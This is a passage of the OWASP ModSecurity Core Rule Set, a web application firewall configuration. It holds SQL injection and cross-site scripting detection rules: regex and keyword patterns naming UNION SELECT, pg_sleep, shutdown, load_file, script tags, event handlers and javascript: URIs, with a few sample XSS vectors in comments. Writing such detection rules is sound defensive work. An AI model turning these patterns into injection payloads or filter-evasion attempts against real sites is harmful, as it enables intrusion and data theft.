%{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.id}-%{rule.msg}',setvar:tx.sql_injection_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{tx.msg}-OWASP_CRS/WEB_ATTACK/SQLI-%{matched_var_name}=%{tx.0}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:merge.*?using\s*?\()|(execute\s*?immediate\s*?[\"'`´’‘])|(?:\W+\d*?\s*?having\s*?[^\s\-])|(?:match\s*?[\w(),+-]+\s*?against\s*?\())" "phase:2,capture,t:none,t:urlDecodeUni,block,msg:'Detects MATCH AGAINST, MERGE, EXECUTE IMMEDIATE and HAVING injections',id:'981256',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.id}-%{rule.msg}',setvar:tx.sql_injection_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{tx.msg}-OWASP_CRS/WEB_ATTACK/SQLI-%{matched_var_name}=%{tx.0}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:union\s*?(?:all|distinct|[(!@]*?)?\s*?[([]*?\s*?select\s+)|(?:\w+\s+like\s+[\"'`´’‘])|(?:like\s*?[\"'`´’‘]\%)|(?:[\"'`´’‘]\s*?like\W*?[\"'`´’‘\d])|(?:[\"'`´’‘]\s*?(?:n?and|x?x?or|div|like|between|and|not |\|\||\&\&)\s+[\s\w]+=\s*?\w+\s*?having\s+)|(?:[\"'`´’‘]\s*?\*\s*?\w+\W+[\"'`´’‘])|(?:[\"'`´’‘]\s*?[^?\w\s=.,;)(]+\s*?[(@\"'`´’‘]*?\s*?\w+\W+\w)|(?:select\s+?[\[\]()\s\w\.,\"'`´’‘-]+from\s+)|(?:find_in_set\s*?\())" "phase:2,capture,t:none,t:urlDecodeUni,block,msg:'Detects basic SQL authentication bypass attempts 2/3',id:'981245',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.id}-%{rule.msg}',setvar:tx.sql_injection_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{tx.msg}-OWASP_CRS/WEB_ATTACK/SQLI-%{matched_var_name}=%{tx.0}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:(union(.*?)select(.*?)from)))" "phase:2,capture,t:none,t:urlDecodeUni,block,msg:'Looking for basic sql injection. Common attack string for mysql, oracle and others.',id:'981276',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.id}-%{rule.msg}',setvar:tx.sql_injection_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{tx.msg}-OWASP_CRS/WEB_ATTACK/SQLI-%{matched_var_name}=%{tx.0}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:select\s*?pg_sleep)|(?:waitfor\s*?delay\s?[\"'`´’‘]+\s?\d)|(?:;\s*?shutdown\s*?(?:;|--|#|\/\*|{)))" "phase:2,capture,t:none,t:urlDecodeUni,block,msg:'Detects Postgres pg_sleep injection, waitfor delay attacks and database shutdown attempts',id:'981254',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.id}-%{rule.msg}',setvar:tx.sql_injection_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{tx.msg}-OWASP_CRS/WEB_ATTACK/SQLI-%{matched_var_name}=%{tx.0}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:\[\$(?:ne|eq|lte?|gte?|n?in|mod|all|size|exists|type|slice|x?or|div|like|between|and)\]))" "phase:2,capture,t:none,t:urlDecodeUni,block,msg:'Finds basic MongoDB SQL injection attempts',id:'981270',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.id}-%{rule.msg}',setvar:tx.sql_injection_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{tx.msg}-OWASP_CRS/WEB_ATTACK/SQLI-%{matched_var_name}=%{tx.0}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:\)\s*?when\s*?\d+\s*?then)|(?:[\"'`´’‘]\s*?(?:#|--|{))|(?:\/\*!\s?\d+)|(?:ch(?:a)?r\s*?\(\s*?\d)|(?:(?:(n?and|x?x?or|div|like|between|and|not)\s+|\|\||\&\&)\s*?\w+\())" "phase:2,capture,t:none,t:urlDecodeUni,block,msg:'Detects MySQL comments, conditions and ch(a)r injections',id:'981240',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.id}-%{rule.msg}',setvar:tx.sql_injection_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{tx.msg}-OWASP_CRS/WEB_ATTACK/SQLI-%{matched_var_name}=%{tx.0}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:[\"'`´’‘]\s+and\s*?=\W)|(?:\(\s*?select\s*?\w+\s*?\()|(?:\*\/from)|(?:\+\s*?\d+\s*?\+\s*?@)|(?:\w[\"'`´’‘]\s*?(?:[-+=|@]+\s*?)+[\d(])|(?:coalesce\s*?\(|@@\w+\s*?[^\w\s])|(?:\W!+[\"'`´’‘]\w)|(?:[\"'`´’‘];\s*?(?:if|while|begin))|(?:[\"'`´’‘][\s\d]+=\s*?\d)|(?:order\s+by\s+if\w*?\s*?\()|(?:[\s(]+case\d*?\W.+[tw]hen[\s(]))" "phase:2,capture,t:none,t:urlDecodeUni,block,msg:'Detects chained SQL injection attempts 2/2',id:'981249',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.id}-%{rule.msg}',setvar:tx.sql_injection_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{tx.msg}-OWASP_CRS/WEB_ATTACK/SQLI-%{matched_var_name}=%{tx.0}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:procedure\s+analyse\s*?\()|(?:;\s*?(declare|open)\s+[\w-]+)|(?:create\s+(procedure|function)\s*?\w+\s*?\(\s*?\)\s*?-)|(?:declare[^\w]+[@#]\s*?\w+)|(exec\s*?\(\s*?@))" "phase:2,capture,t:none,t:urlDecodeUni,block,msg:'Detects MySQL and PostgreSQL stored procedure/function injections',id:'981253',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.id}-%{rule.msg}',setvar:tx.sql_injection_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{tx.msg}-OWASP_CRS/WEB_ATTACK/SQLI-%{matched_var_name}=%{tx.0}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:[\"'`´’‘]\s*?(x?or|div|like|between|and)\s*?[\"'`´’‘]?\d)|(?:\\\\x(?:23|27|3d))|(?:^.?[\"'`´’‘]$)|(?:(?:^[\"'`´’‘\\\\]*?(?:[\d\"'`´’‘]+|[^\"'`´’‘]+[\"'`´’‘]))+\s*?(?:n?and|x?x?or|div|like|between|and|not|\|\||\&\&)\s*?[\w\"'`´’‘][+&!@(),.-])|(?:[^\w\s]\w+\s*?[|-]\s*?[\"'`´’‘]\s*?\w)|(?:@\w+\s+(and|x?or|div|like|between|and)\s*?[\"'`´’‘\d]+)|(?:@[\w-]+\s(and|x?or|div|like|between|and)\s*?[^\w\s])|(?:[^\w\s:]\s*?\d\W+[^\w\s]\s*?[\"'`´’‘].)|(?:\Winformation_schema|table_name\W))" "phase:2,capture,t:none,t:urlDecodeUni,block,msg:'Detects classic SQL injection probings 1/2',id:'981242',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.id}-%{rule.msg}',setvar:tx.sql_injection_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{tx.msg}-OWASP_CRS/WEB_ATTACK/SQLI-%{matched_var_name}=%{tx.0}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:in\s*?\(+\s*?select)|(?:(?:n?and|x?x?or|div|like|between|and|not |\|\||\&\&)\s+[\s\w+]+(?:regexp\s*?\(|sounds\s+like\s*?[\"'`´’‘]|[=\d]+x))|([\"'`´’‘]\s*?\d\s*?(?:--|#))|(?:[\"'`´’‘][\%&<>^=]+\d\s*?(=|x?or|div|like|between|and))|(?:[\"'`´’‘]\W+[\w+-]+\s*?=\s*?\d\W+[\"'`´’‘])|(?:[\"'`´’‘]\s*?is\s*?\d.+[\"'`´’‘]?\w)|(?:[\"'`´’‘]\|?[\w-]{3,}[^\w\s.,]+[\"'`´’‘])|(?:[\"'`´’‘]\s*?is\s*?[\d.]+\s*?\W.*?[\"'`´’‘]))" "phase:2,capture,t:none,t:urlDecodeUni,block,msg:'Detects basic SQL authentication bypass attempts 3/3',id:'981246',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.id}-%{rule.msg}',setvar:tx.sql_injection_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{tx.msg}-OWASP_CRS/WEB_ATTACK/SQLI-%{matched_var_name}=%{tx.0}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:create\s+function\s+\w+\s+returns)|(?:;\s*?(?:select|create|rename|truncate|load|alter|delete|update|insert|desc)\s*?[\[(]?\w{2,}))" "phase:2,capture,t:none,t:urlDecodeUni,block,msg:'Detects MySQL UDF injection and other data/structure manipulation attempts',id:'981251',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.id}-%{rule.msg}',setvar:tx.sql_injection_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{tx.msg}-OWASP_CRS/WEB_ATTACK/SQLI-%{matched_var_name}=%{tx.0}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:[\d\W]\s+as\s*?[\"'`´’‘\w]+\s*?from)|(?:^[\W\d]+\s*?(?:union|select|create|rename|truncate|load|alter|delete|update|insert|desc))|(?:(?:select|create|rename|truncate|load|alter|delete|update|insert|desc)\s+(?:(?:group_)concat|char|load_file)\s?\(?)|(?:end\s*?\);)|([\"'`´’‘]\s+regexp\W)|(?:[\s(]load_file\s*?\())" "phase:2,capture,t:none,t:urlDecodeUni,block,msg:'Detects concatenated basic SQL injection and SQLLFI attempts',id:'981247',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.id}-%{rule.msg}',setvar:tx.sql_injection_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{tx.msg}-OWASP_CRS/WEB_ATTACK/SQLI-%{matched_var_name}=%{tx.0}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:[\"'`´’‘]\s*?\*.+(?:x?or|div|like|between|and|id)\W*?[\"'`´’‘]\d)|(?:\^[\"'`´’‘])|(?:^[\w\s\"'`´’‘-]+(?<=and\s)(?<=or|xor|div|like|between|and\s)(?<=xor\s)(?<=nand\s)(?<=not\s)(?<=\|\|)(?<=\&\&)\w+\()|(?:[\"'`´’‘][\s\d]*?[^\w\s]+\W*?\d\W*?.*?[\"'`´’‘\d])|(?:[\"'`´’‘]\s*?[^\w\s?]+\s*?[^\w\s]+\s*?[\"'`´’‘])|(?:[\"'`´’‘]\s*?[^\w\s]+\s*?[\W\d].*?(?:#|--))|(?:[\"'`´’‘].*?\*\s*?\d)|(?:[\"'`´’‘]\s*?(x?or|div|like|between|and)\s[^\d]+[\w-]+.*?\d)|(?:[()\*<>%+-][\w-]+[^\w\s]+[\"'`´’‘][^,]))" "phase:2,capture,t:none,t:urlDecodeUni,block,msg:'Detects classic SQL injection probings 2/2',id:'981243',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.id}-%{rule.msg}',setvar:tx.sql_injection_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{tx.msg}-OWASP_CRS/WEB_ATTACK/SQLI-%{matched_var_name}=%{tx.0}'" ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/base_rules/modsecurity_crs_41_xss_attacks.conf�������������0000664�0000000�0000000�00000274707�12164572564�0031671�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # -=[ XSS Filters - Category 1 ]=- # script tag based XSS vectors, e.g., <script> alert(1)</script> # SecRule ARGS "(?i)(<script[^>]*>[\s\S]*?<\/script[^>]*>|<script[^>]*>[\s\S]*?<\/script[[\s\S]]*[\s\S]|<script[^>]*>[\s\S]*?<\/script[\s]*[\s]|<script[^>]*>[\s\S]*?<\/script|<script[^>]*>[\s\S]*?)" "id:'973336',phase:2,rev:'1',ver:'OWASP_CRS/2.2.8',maturity:'1',accuracy:'8',t:none,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,log,capture,msg:'XSS Filter - Category 1: Script Tag Vector',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" # # -=[ XSS Filters - Category 2 ]=- # XSS vectors making use of event handlers like onerror, onload etc, e.g., <body onload="alert(1)"> # SecRule ARGS "(?i)([\s\"'`;\/0-9\=]+on\w+\s*=)" "id:'973337',phase:2,t:none,rev:'1',ver:'OWASP_CRS/2.2.8',maturity:'1',accuracy:'8',t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,log,capture,msg:'XSS Filter - Category 2: Event Handler Vector',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" # # -=[ XSS Filters - Category 3 ]=- # XSS vectors making use of Javascripts URIs, e.g., <p style="background:url(javascript:alert(1))"> # SecRule ARGS "(?i)((?:=|U\s*R\s*L\s*\()\s*[^>]*\s*S\s*C\s*R\s*I\s*P\s*T\s*:|:|[\s\S]allowscriptaccess[\s\S]|[\s\S]src[\s\S]|[\s\S]data:text\/html[\s\S]|[\s\S]xlink:href[\s\S]|[\s\S]base64[\s\S]|[\s\S]xmlns[\s\S]|[\s\S]xhtml[\s\S]|[\s\S]style[\s\S]|<style[^>]*>[\s\S]*?|[\s\S]@import[\s\S]|<applet[^>]*>[\s\S]*?|<meta[^>]*>[\s\S]*?|<object[^>]*>[\s\S]*?)" "id:'973338',phase:2,t:none,rev:'1',ver:'OWASP_CRS/2.2.8',maturity:'1',accuracy:'8',t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,log,capture,tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',msg:'XSS Filter - Category 3: Javascript URI Vector',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" # # XSS # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pm jscript onsubmit copyparentfolder document javascript meta onchange onmove onkeydown onkeyup activexobject onerror onmouseup ecmascript bexpression onmouseover vbscript: <![cdata[ http: .innerhtml settimeout shell: onabort asfunction: onkeypress onmousedown onclick .fromcharcode background-image: x-javascript ondragdrop onblur mocha: javascript: onfocus lowsrc getparentfolder onresize @import alert script onselect onmouseout application onmousemove background .execscript livescript: vbscript getspecialfolder .addimport iframe onunload createtextrange <input onload" \ "phase:2,id:'981136',rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,pass,nolog,setvar:tx.pm_xss_score=+%{tx.critical_anomaly_score}" SecRule &TX:PM_XSS_SCORE "@eq 0" "phase:2,id:'981018',t:none,pass,skipAfter:END_XSS_CHECK,nolog" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bgetparentfolder\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958016',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bonmousedown\b\W*?\=" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958414',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bsrc\b\W*?\bshell:" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958032',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bmocha:" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958026',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bonabort\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958027',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\blowsrc\b\W*?\bhttp:" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958054',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bonmouseup\b\W*?\=" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958418',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bstyle\b\W*\=.*bexpression\b\W*\(" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958034',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bhref\b\W*?\bshell:" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958019',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule 